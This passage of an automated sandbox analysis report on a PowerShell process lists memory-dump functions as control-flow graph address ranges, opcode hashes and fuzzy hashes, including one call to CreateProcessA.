7ffd9b87c92b-7ffd9b87c932 call 7ffd9b8706b0 56->58 59 7ffd9b87c940-7ffd9b87c952 57->59 60 7ffd9b87c956-7ffd9b87c95e 57->60 58->57 65 7ffd9b87c954-7ffd9b87c955 59->65 66 7ffd9b87c9ba-7ffd9b87c9c2 59->66 63 7ffd9b87c960-7ffd9b87c971 60->63 64 7ffd9b87c977-7ffd9b87c987 60->64 63->64 65->60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2812582608.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h__H
                                                        • API String ID: 0-4245872964
                                                        • Opcode ID: 84c9a14386d8547c556690142bb26bcba7c2270d05d91080fd2655cc2827b3c0
                                                        • Instruction ID: 19881969a709bb2558c82ed734fed588cfb3140a5c45cc4960fcc0b99d76c57a
                                                        • Opcode Fuzzy Hash: 84c9a14386d8547c556690142bb26bcba7c2270d05d91080fd2655cc2827b3c0
                                                        • Instruction Fuzzy Hash: BBF1C330618A8D8FEB78DF58DC5A7E937D1FB59314F01422AD84DC7291DF35AA818B81
                                                        Function 00007FFD9B87C45D Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 445processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 68 7ffd9b87c45d-7ffd9b87c499 69 7ffd9b87c42e-7ffd9b87c441 68->69 70 7ffd9b87c49b-7ffd9b87c4e3 68->70 72 7ffd9b87c443-7ffd9b87c44b 69->72 73 7ffd9b87c452-7ffd9b87c45b 69->73 74 7ffd9b87c54c-7ffd9b87c556 70->74 75 7ffd9b87c4e5-7ffd9b87c54a 70->75 72->73 76 7ffd9b87c5b4-7ffd9b87c5e6 74->76 77 7ffd9b87c558-7ffd9b87c567 74->77 75->74 85 7ffd9b87c644-7ffd9b87c6a9 76->85 86 7ffd9b87c5e8-7ffd9b87c5f7 76->86 77->76 78 7ffd9b87c569-7ffd9b87c56c 77->78 80 7ffd9b87c56e-7ffd9b87c581 78->80 81 7ffd9b87c5a6-7ffd9b87c5ae 78->81 83 7ffd9b87c583 80->83 84 7ffd9b87c585-7ffd9b87c598 80->84 81->76 83->84 84->84 88 7ffd9b87c59a-7ffd9b87c5a2 84->88 93 7ffd9b87c6ab-7ffd9b87c6ba 85->93 94 7ffd9b87c707-7ffd9b87c80d CreateProcessA 85->94 86->85 89 7ffd9b87c5f9-7ffd9b87c5fc 86->89 88->81 91 7ffd9b87c5fe-7ffd9b87c611 89->91 92 7ffd9b87c636-7ffd9b87c63e 89->92 95 7ffd9b87c613 91->95 96 7ffd9b87c615-7ffd9b87c628 91->96 92->85 93->94 97 7ffd9b87c6bc-7ffd9b87c6bf 93->97 106 7ffd9b87c80f 94->106 107 7ffd9b87c815-7ffd9b87c899 call 7ffd9b87c8bd 94->107 95->96 96->96 98 7ffd9b87c62a-7ffd9b87c632 96->98 99 7ffd9b87c6c1-7ffd9b87c6d4 97->99 100 7ffd9b87c6f9-7ffd9b87c701 97->100 98->92 102 7ffd9b87c6d8-7ffd9b87c6eb 99->102 103 7ffd9b87c6d6 99->103 100->94 102->102 105 7ffd9b87c6ed-7ffd9b87c6f5 102->105 103->102 105->100 106->107 115 7ffd9b87c902-7ffd9b87c90a 107->115 116 7ffd9b87c89b-7ffd9b87c8a1 107->116 117 7ffd9b87c90c-7ffd9b87c913 call 7ffd9b8706b0 115->117 118 7ffd9b87c918-7ffd9b87c91f 115->118 119 7ffd9b87c8a3 116->119 120 7ffd9b87c8a8-7ffd9b87c8bc 116->120 117->118 122 7ffd9b87c921-7ffd9b87c929 118->122 123 7ffd9b87c937-7ffd9b87c93e 118->123 119->120 122->123 124 7ffd9b87c92b-7ffd9b87c932 call 7ffd9b8706b0 122->124 125 7ffd9b87c940-7ffd9b87c952 123->125 126 7ffd9b87c956-7ffd9b87c95e 123->126 124->123 131 7ffd9b87c954-7ffd9b87c955 125->131 132 7ffd9b87c9ba-7ffd9b87c9c2 125->132 129 7ffd9b87c960-7ffd9b87c971 126->129 130 7ffd9b87c977-7ffd9b87c987 126->130 129->130 131->126
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2812582608.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: h__H
                                                        • API String ID: 963392458-4245872964
                                                        • Opcode ID: 430a5d7a23892675b44626daa6c06872e2b572070e66655afd5501bfcfb309a7
                                                        • Instruction ID: a9c8d5a6c2618a555e6ad9037fac8754b37e17c218030d6e13abbf9bff6331bf
                                                        • Opcode Fuzzy Hash: 430a5d7a23892675b44626daa6c06872e2b572070e66655afd5501bfcfb309a7
                                                        • Instruction Fuzzy Hash: E2E1D430618A8D4FDB69DF18CC9A7E53BE1FF59310F05426AD84DC7291DF74AA418B82
                                                        Function 00007FFD9B9416AD Relevance: .5, Instructions: 520COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 134 7ffd9b9416ad-7ffd9b94173f 138 7ffd9b941745-7ffd9b94174f 134->138 139 7ffd9b94197a-7ffd9b9419a9 134->139 140 7ffd9b941751-7ffd9b94175f 138->140 141 7ffd9b941769-7ffd9b94176f 138->141 155 7ffd9b9419b5-7ffd9b9419d8 139->155 156 7ffd9b9419ab-7ffd9b9419b1 139->156 140->141 148 7ffd9b941761-7ffd9b941767 140->148 143 7ffd9b94190f-7ffd9b941919 141->143 144 7ffd9b941775-7ffd9b941778 141->144 146 7ffd9b94192c-7ffd9b941977 143->146 147 7ffd9b94191b-7ffd9b94192b 143->147 149 7ffd9b94178f-7ffd9b941793 144->149 150 7ffd9b94177a-7ffd9b941783 144->150 146->139 148->141 149->143 154 7ffd9b941799-7ffd9b9417d0 149->154 150->149 171 7ffd9b9417f4 154->171 172 7ffd9b9417d2-7ffd9b9417f2 154->172 165 7ffd9b941a03-7ffd9b941a0f 155->165 166 7ffd9b9419da-7ffd9b941a01 155->166 156->155 170 7ffd9b941a1a-7ffd9b941a2b 165->170 166->165 178 7ffd9b941a2d 170->178 179 7ffd9b941a34-7ffd9b941a43 170->179 174 7ffd9b9417f6-7ffd9b9417f8 171->174 172->174 174->143 177 7ffd9b9417fe-7ffd9b941801 174->177 181 7ffd9b941803-7ffd9b941816 177->181 182 7ffd9b941818 177->182 178->179 183 7ffd9b941a45 179->183 184 7ffd9b941a4c-7ffd9b941a78 179->184 187 7ffd9b94181a-7ffd9b94181c 181->187 182->187 183->184 188 7ffd9b941a93-7ffd9b941a99 184->188 189 7ffd9b941a7a-7ffd9b941a80 184->189 187->143 190 7ffd9b941822-7ffd9b941825 187->190 194 7ffd9b941a9b-7ffd9b941b00 188->194 193 7ffd9b941a82-7ffd9b941a92 189->193 189->194 191 7ffd9b941827-7ffd9b941830 190->191 192 7ffd9b94183c-7ffd9b941840 190->192 191->192 192->143 198 7ffd9b941846-7ffd9b941880 192->198 193->188 208 7ffd9b941882-7ffd9b94188f 198->208 209 7ffd9b941899-7ffd9b94189f 198->209 208->209 216 7ffd9b941891-7ffd9b941897 208->216 211 7ffd9b9418a1-7ffd9b9418b9 209->211 212 7ffd9b9418bb-7ffd9b9418c1 209->212 211->212 214 7ffd9b9418dd-7ffd9b9418e3 212->214 215 7ffd9b9418c3-7ffd9b9418db 212->215 219 7ffd9b9418ea-7ffd9b9418f2 214->219 215->214 216->209 222 7ffd9b9418f4-7ffd9b9418f8 219->222 223 7ffd9b9418fa-7ffd9b9418ff 219->223 224 7ffd9b941900-7ffd9b94190e 222->224 223->224
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2813401301.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b940000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 60f90a73f9c2cb65a855566e400858b8ff82f2a07d697dfbd21661c46954e38e
                                                        • Instruction ID: 96c9ca4c07184d890d90ab7a47b7085cd04135073f5ec709f8ae40f4e9d213e8
                                                        • Opcode Fuzzy Hash: 60f90a73f9c2cb65a855566e400858b8ff82f2a07d697dfbd21661c46954e38e
                                                        • Instruction Fuzzy Hash: A2E13822B1FBEA1FE76A976858715B43FE2EF42214B0A01FBD099C71F3D9185D458342
                                                        Function 00007FFD9B944435 Relevance: .4, Instructions: 437COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 226 7ffd9b944435-7ffd9b9444c4 230 7ffd9b94472c-7ffd9b9447eb 226->230 231 7ffd9b9444ca-7ffd9b9444d4 226->231 232 7ffd9b9444ed-7ffd9b9444f2 231->232 233 7ffd9b9444d6-7ffd9b9444e3 231->233 235 7ffd9b9446d0-7ffd9b9446da 232->235 236 7ffd9b9444f8-7ffd9b9444fb 232->236 233->232 238 7ffd9b9444e5-7ffd9b9444eb 233->238 239 7ffd9b9446dc-7ffd9b9446e8 235->239 240 7ffd9b9446e9-7ffd9b944729 235->240 241 7ffd9b9444fd-7ffd9b944510 236->241 242 7ffd9b944512 236->242 238->232 240->230 245 7ffd9b944514-7ffd9b944516 241->245 242->245 245->235 248 7ffd9b94451c-7ffd9b944550 245->248 260 7ffd9b944552-7ffd9b944565 248->260 261 7ffd9b944567 248->261 263 7ffd9b944569-7ffd9b94456b 260->263 261->263 263->235 265 7ffd9b944571-7ffd9b944579 263->265 265->230 266 7ffd9b94457f-7ffd9b944589 265->266 268 7ffd9b9445a5-7ffd9b9445b5 266->268 269 7ffd9b94458b-7ffd9b9445a3 266->269 268->235 273 7ffd9b9445bb-7ffd9b9445ec 268->273 269->268 273->235 279 7ffd9b9445f2-7ffd9b94461e 273->279 284 7ffd9b944620-7ffd9b944647 279->284 285 7ffd9b944649 279->285 286 7ffd9b94464b-7ffd9b94464d 284->286 285->286 286->235 287 7ffd9b944653-7ffd9b94465b 286->287 289 7ffd9b94465d-7ffd9b944667 287->289 290 7ffd9b94466b 287->290 292 7ffd9b944687-7ffd9b9446b6 289->292 293 7ffd9b944669 289->293 294 7ffd9b944670-7ffd9b944685 290->294 299 7ffd9b9446bd-7ffd9b9446cf 292->299 293->294 294->292
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2813401301.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b940000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 312b5095b6c09f0adbcc07c64232cc9986ccadec01a4d6e587c45257e686186a
                                                        • Instruction ID: e58c04596aaeec3c868d3f393db9ceafbec40d5e8fa2083fc6af2a7160d03392
                                                        • Opcode Fuzzy Hash: 312b5095b6c09f0adbcc07c64232cc9986ccadec01a4d6e587c45257e686186a
                                                        • Instruction Fuzzy Hash: BBD16831B1FA9E1FEB659BA848656B97BD2EF11314F0900FED45CCB1E3DD18A9018341
                                                        Function 00007FFD9B941834 Relevance: .1, Instructions: 97COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2813401301.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b940000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b7db6e240d0dd03a4ce50df76703fb42b339e61220a5cd4a888374936339aee
                                                        • Instruction ID: a7038b0115fdd488bcbe035a81d2ff4c91f858180edfa0d063f69444ef5aa546
                                                        • Opcode Fuzzy Hash: 5b7db6e240d0dd03a4ce50df76703fb42b339e61220a5cd4a888374936339aee
                                                        • Instruction Fuzzy Hash: F221D922F2FA7E1BF3B9976854611746BC3DF94258B5A00BED45DC72E3ED29AC054301

                                                        Non-executed Functions

                                                        Function 00007FFD9B875F78 Relevance: 3.2, Strings: 2, Instructions: 742COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 471 7ffd9b875f78-7ffd9b875fc4 477 7ffd9b875fc5-7ffd9b875fdc 471->477 479 7ffd9b875fde-7ffd9b876031 477->479 485 7ffd9b876035-7ffd9b87604c 479->485 488 7ffd9b87604e-7ffd9b8760c1 485->488 496 7ffd9b8760c4-7ffd9b8760dc 488->496 499 7ffd9b8760de-7ffd9b876131 496->499 505 7ffd9b876134-7ffd9b87614c 499->505 508 7ffd9b87614e-7ffd9b876229 505->508 523 7ffd9b87622b-7ffd9b876244 508->523 526 7ffd9b876246-7ffd9b876329 523->526 542 7ffd9b87632a-7ffd9b876344 526->542 545 7ffd9b876346-7ffd9b876362 542->545 547 7ffd9b8763b3-7ffd9b8763b6 545->547 548 7ffd9b876364-7ffd9b87636a 545->548 549 7ffd9b8763bb-7ffd9b8763bf 547->549 548->549 550 7ffd9b87636c-7ffd9b876372 548->550 551 7ffd9b8763c3-7ffd9b8763c9 549->551 550->551 552 7ffd9b876374-7ffd9b8763b1 550->552 553 7ffd9b87641b-7ffd9b87641e 551->553 554 7ffd9b8763cc-7ffd9b8763d1 551->554 552->547 556 7ffd9b876423-7ffd9b876441 553->556 554->547 561 7ffd9b876443-7ffd9b8764af 556->561 571 7ffd9b8764b2 561->571 572 7ffd9b876503-7ffd9b87652e 571->572 573 7ffd9b8764b4-7ffd9b8764d1 571->573 577 7ffd9b876530-7ffd9b876536 572->577 578 7ffd9b87654d-7ffd9b87654e 572->578 573->571 583 7ffd9b876554-7ffd9b876556 577->583 584 7ffd9b876538-7ffd9b87653e 577->584 579 7ffd9b876550 578->579 580 7ffd9b876569-7ffd9b87656e 578->580 579->583 582 7ffd9b876570-7ffd9b876576 580->582 588 7ffd9b876577-7ffd9b87657d 582->588 583->582 585 7ffd9b876558 583->585 589 7ffd9b87655b-7ffd9b87655e 584->589 590 7ffd9b876540-7ffd9b876546 584->590 585->589 594 7ffd9b87657e-7ffd9b8765af 588->594 589->588 591 7ffd9b876560 589->591 595 7ffd9b876562-7ffd9b876566 590->595 596 7ffd9b876548 590->596 591->595 604 7ffd9b8765b1-7ffd9b8765d1 594->604 595->594 598 7ffd9b876568 595->598 596->578 598->580 604->604
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2812582608.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O_I$O_I
                                                        • API String ID: 0-150625707
                                                        • Opcode ID: c72bd7ce3ba7a326ea53db63477430c8cacbb8e58a0868743bc0eeb8bb64fd9f
                                                        • Instruction ID: 4078676d52fb6c07188fb05b862b36a9e4723689ef65fd8e33c7acb5170bc1a4
                                                        • Opcode Fuzzy Hash: c72bd7ce3ba7a326ea53db63477430c8cacbb8e58a0868743bc0eeb8bb64fd9f
                                                        • Instruction Fuzzy Hash: E5123DC7F0F9920BE36557EC78691E81B91EFC526870941F7D198CB0EBBC046D4AA2D1